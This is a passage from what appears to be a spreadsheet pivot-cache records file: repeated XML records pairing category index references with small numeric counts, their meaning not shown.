    <x v="1044"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1044"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1044"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1044"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1044"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1044"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1044"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1044"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="6"/>
    <x v="1044"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1044"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="30"/>
    <x v="1044"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1020"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1045"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1045"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1045"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1045"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1045"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1045"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1045"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1045"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1045"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1045"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="1045"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1045"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1045"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1045"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1046"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1046"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1046"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1046"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1046"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1046"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="1046"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1046"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1046"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1046"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="30"/>
    <x v="1046"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="40"/>
    <x v="1046"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1046"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1046"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1046"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="1047"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="6"/>
    <x v="1047"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="16"/>
    <x v="1047"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="81"/>
    <x v="1047"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1047"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1047"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1047"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1047"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1047"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="6"/>
    <x v="1047"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="16"/>
    <x v="1047"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="59"/>
    <x v="1047"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="15"/>
    <x v="1047"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1047"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1048"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1048"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1048"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1048"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1048"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1048"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="17"/>
    <x v="1048"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1048"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1048"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1048"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1048"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1048"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="1048"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1048"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1049"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1049"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1049"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1049"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1049"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1049"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1049"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1049"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1049"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1049"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1049"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1049"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1049"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="30"/>
    <x v="1049"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1051"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1051"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1051"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1051"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1051"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1051"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1051"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1051"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1051"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1051"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="1051"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1051"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1051"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1051"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1050"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1052"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1052"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1052"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1052"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1052"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1052"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1052"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1052"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1052"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1052"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1052"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1052"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1052"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1052"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="718"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="718"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="11"/>
    <x v="718"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="718"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1053"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1053"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1053"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1053"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1053"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1053"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="64"/>
    <x v="1053"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1053"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1053"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1053"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1053"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1053"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1053"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1053"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1054"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1054"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1054"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1054"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1054"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1054"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1054"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1054"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="1054"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1054"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1054"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1054"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1054"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1054"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1055"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1055"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1055"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1055"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1055"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1055"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1055"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1055"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1055"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1055"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1055"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1055"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1055"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1055"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1056"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1056"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1056"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1056"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1056"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1056"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="1056"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1056"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1056"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1056"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="30"/>
    <x v="1056"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="1056"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1056"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1056"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1057"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1057"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1057"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1057"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1057"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1057"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1057"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1057"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1057"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1057"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1057"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1057"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1057"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1057"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1058"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1058"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="10"/>
    <x v="1058"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1058"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1058"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1058"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1058"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1058"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1058"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1058"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1058"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1058"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1058"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1058"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1059"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1059"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1059"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1059"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1059"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="1059"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1059"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1059"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1059"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="1059"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="9"/>
    <x v="1059"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="1059"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1059"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1059"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="34"/>
    <x v="105"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="34"/>
    <x v="105"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1060"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1060"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1060"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1060"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1060"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1060"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1060"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1060"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1060"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1060"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="1060"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1060"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1060"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1060"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1061"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1061"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1061"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1061"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1061"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1061"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="19"/>
    <x v="1061"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="1061"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1061"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1061"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="86"/>
    <x v="1061"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="369"/>
    <x v="1061"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1061"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1061"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1062"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1062"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1062"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1062"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1062"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1062"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1062"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1062"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1062"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1062"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1062"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1062"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1062"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1062"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1063"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1063"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1063"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1063"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1063"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="1063"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="14"/>
    <x v="1063"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="14"/>
    <x v="1063"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1063"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1063"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1063"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1063"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1063"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1063"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1064"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1064"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1064"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1064"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1064"/>
